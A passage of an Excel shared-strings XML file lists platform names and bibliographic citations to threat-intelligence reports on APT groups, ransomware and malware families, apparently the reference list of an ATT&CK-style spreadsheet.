  </si>
  <si>
    <t>Linux, Containers, IaaS</t>
  </si>
  <si>
    <t>Linux, Windows</t>
  </si>
  <si>
    <t>TOOL</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Linux, Windows, macOS, Android</t>
  </si>
  <si>
    <t>Containers, Linux</t>
  </si>
  <si>
    <t>macOS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>macOS, Windows</t>
  </si>
  <si>
    <t>Office 365, Windows, Azure AD</t>
  </si>
  <si>
    <t>Windows, Office 365</t>
  </si>
  <si>
    <t>Windows, Containers</t>
  </si>
  <si>
    <t>Network</t>
  </si>
  <si>
    <t>iOS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.</t>
  </si>
  <si>
    <t>Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part Retrieved September 20, 2021.</t>
  </si>
  <si>
    <t>Unit4(2016). SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE. Retrieved November 13, 2018.</t>
  </si>
  <si>
    <t>CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft. (n.d.). Arp. Retrieved April 17, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec Security Response Attack Investigation Team. (2018, April 23). New Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia. Retrieved May 8, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>McAfee® Foundstone® Professional Services and McAfee Labs™. (2011, February 10). Global Energy Cyberattacks: “Night Dragon”. Retrieved February 19, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT4Retrieved September 23, 2019.</t>
  </si>
  <si>
    <t>Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Salem, E. (2019, February 13). ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA. Retrieved April 17, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Doaty, J., Garrett, P.. (2018, September 10). We’re Seeing a Resurgence of the Demonic Astaroth WMIC Trojan. Retrieved April 17, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft. (n.d.). At. Retrieved April 28, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cybereason Nocturnus. (2019, June 25). Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers. Retrieved July 18, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Trend Micro. (2018, November 20). Lazarus Continues Heists, Mounts Attacks on Financial Organizations in Latin America. Retrieved December 3, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Gahlot, A. (n.d.). Threat Hunting for Avaddon Ransomware. Retrieved August 19, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Yuste, J. Pastrana, S. (2021, February 9). Avaddon ransomware: an in-depth analysis and decryption of infected systems. Retrieved August 19, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Security Lab. (2020, June 5). Avaddon: From seeking affiliates to in-the-wild in 2 days. Retrieved August 19, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Yan, T., et al. (2018, November 21). New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit. Retrieved November 29, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Proofpoint. (2018, July 30). New version of AZORult stealer improves loading features, spreads alongside ransomware in new campaign. Retrieved November 29, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sogeti. (2021, March). Babuk Ransomware. Retrieved August 11, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mundo, A. et al. (2021, February). Technical Analysis of Babuk Ransomware. Retrieved August 11, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Lyngaas, S. (2021, February 4). Meet Babuk, a ransomware attacker blamed for the Serco breach. Retrieved August 11, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Centero, R. et al. (2021, February 5). New in Ransomware: Seth-Locker, Babuk Locker, Maoloa, TeslaCrypt, and CobraLocker. Retrieved August 11, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sebdraven. (2021, February 8). Babuk is distributed packed. Retrieved August 11, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Unit 4(2019, February 22). New BabyShark Malware Targets U.S. National Security Think Tanks. Retrieved October 7, 2019.</t>
  </si>
  <si>
    <t>CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Lim, M.. (2019, April 26). BabyShark Malware Part Two – Attacks Continue Using KimJongRAT and PCRat . Retrieved October 7, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Slowik, J.. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved January 28, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>US-CERT. (2018, February 06). Malware Analysis Report (MAR) - 10135536-G. Retrieved June 7, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Bar, T., Conant, S. (2017, October 20). BadPatch. Retrieved November 13, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Galperin, E., Et al.. (2016, August). I Got a Letter From the Government the Other Day.... Retrieved April 25, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Check Point. (2020, November 26). Bandook: Signed &amp; Delivered. Retrieved May 31, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Galperin, E., Et al.. (2016, August 4). When Governments Attack: State Sponsored Malware Attacks Against Activists, Lawyers, and Journalists. Retrieved May 23, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>US-CERT. (2017, December 13). Malware Analysis Report (MAR) - 10135536-B. Retrieved July 17, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cybereason Nocturnus. (2020, July 16). A BAZAR OF TRICKS: FOLLOWING TEAM9’S DEVELOPMENT CYCLES. Retrieved November 18, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sadique, M. and Singh, A. (2020, September 29). Spear Phishing Campaign Delivers Buer and Bazar Malware. Retrieved November 19, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Lee, B. Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Harbison, M. (2021, February 9). BendyBear: Novel Chinese Shellcode Linked With Cyber Espionage Group BlackTech. Retrieved February 16, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Secureworks. (2021, January 1). BRONZE HUNTLEY Threat Profile. Retrieved May 5, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Frankoff, S., Hartley, B. (2018, November 14). Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware. Retrieved January 6, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Podlosky, A., Feeley, B. (2021, March 17). INDRIK SPIDER Supersedes WastedLocker with Hades Ransomware to Circumvent OFAC Sanctions. Retrieved September 15, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Horejsi, J., et al. (2018, March 14). Tropic Trooper’s New Strategy. Retrieved November 9, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft. (2019, July 12). About BITS. Retrieved March 16, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>F-Secure Labs. (2014). BlackEnergy &amp; Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Baumgartner, K. and Garnaeva, M.. (2014, November 3). BE2 custom plugins, router abuse, and target profiles. Retrieved March 24, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Baumgartner, K. and Garnaeva, M.. (2015, February 17). BE2 extraordinary plugins, Siemens targeting, dev fails. Retrieved March 24, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry . Retrieved June 10, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry. Retrieved May 18, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MSTIC. (2019, December 12). GALLIUM: Targeting global telecom. Retrieved January 13, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>US-CERT. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NHS Digital . (2020, August 20). BLINDINGCAN Remote Access Trojan. Retrieved August 20, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Robbins, A., Vazarkar, R., and Schroeder, W. (2016, April 17). Bloodhound: Six Degrees of Domain Admin. Retrieved March 5, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Red Team Labs. (2018, April 24). Hidden Administrative Accounts: BloodHound to the Rescue. Retrieved October 28, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sean Gallagher, Peter Mackenzie, Elida Leite, Syed Shahram, Bill Kearney, Anand Aijan, Sivagnanam Gn, Suraj Mundalik. (2020, October 14). They’re back: inside a new Ryuk ransomware attack. Retrieved October 14, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cash, D., Grunzweig, J., Meltzer, M., Adair, S., Lancaster, T. (2021, August 17). North Korean APT InkySquid Infects Victims Using Browser Exploits. Retrieved September 30, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dumont, R., M.Léveillé, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Wilhoit, K. and Falcone, R. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. Retrieved February 18, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Carr, N, et all. (2019, October 10). Mahalo FIN7: Responding to the Criminal Operators’ New Tools and Techniques. Retrieved October 11, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mandiant. (2016, February 25). Mandiant M-Trends 201Retrieved March 5, 2019.</t>
  </si>
  <si>
    <t>Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Glyer, C.. (2017, June 22). Boot What?. Retrieved May 4, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Andrey Polkovnichenko and Alon Boxiner. (2015, September 21). BrainTest – A New Level of Sophistication in Mobile Malware. Retrieved December 21, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. Retrieved December 21, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems. Retrieved June 6, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>A. Guertin, V. Kotov, Android Security &amp; Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hazum, A., Melnykov, B., Wernik, I.. (2020, July 9). New Joker variant hits Google Play with an old trick. Retrieved July 20, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ladley, F. (2012, May 15). Backdoor.Briba. Retrieved February 21, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., &amp; Geers, K. (2014). OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Phil Stokes. (2021, February 16). 20 Common Tools &amp; Techniques Used by macOS Threat Actors &amp; Malware. Retrieved August 23, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kuzin, M., Zelensky S. (2018, July 20). Calisto Trojan for macOS. Retrieved September 7, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Pantig, J. (2018, July 30). OSX.Calisto. Retrieved September 7, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved November 26, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Lee, B., Falcone, R. (2018, December 12). Dear Joohn: The Sofacy Group’s Global Campaign. Retrieved April 19, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Prins, R. (2015, February 16). Anunak (aka Carbanak) Update. Retrieved January 20, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Department of Justice. (2018, August 01). HOW FIN7 ATTACKED AND STOLE DATA. Retrieved August 24, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Trend Micro. (2014, February 27). CARBERP. Retrieved July 29, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved March 27, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>RSA. (2017, November 21). THE CARBANAK/FIN7 SYNDICATE A HISTORICAL OVERVIEW OF AN EVOLVING THREAT. Retrieved July 29, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware &amp; Configuration Analysis. Retrieved July 15, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Matrosov, A., Rodionov, E., Volkov, D., Harley, D. (2012, March 2). Win32/Carberp When You’re in a Black Hole, Stop Digging. Retrieved July 15, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ESET. (2017, March 30). Carbon Paper: Peering into Turla’s second stage backdoor. Retrieved November 7, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2018, October 04). Shedding Skin – Turla’s Fresh Faces. Retrieved November 7, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>GovCERT. (2016, May 23). Technical Report about the Espionage Case at RUAG. Retrieved November 7, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Grunzweig, J.. (2017, April 20). Cardinal RAT Active for Over Two Years. Retrieved December 8, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Balanza, M. (2018, April 02). Infostealer.Catchamas. Retrieved July 10, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Security Response Attack Investigation Team. (2018, June 19). Thrip: Espionage Group Hits Satellite, Telecoms, and Defense Companies. Retrieved July 10, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ClearSky Cyber Security. (2021, January). “Lebanese Cedar” APT Global Lebanese Espionage Campaign Leveraging Web Servers. Retrieved February 10, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. Retrieved March 9, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
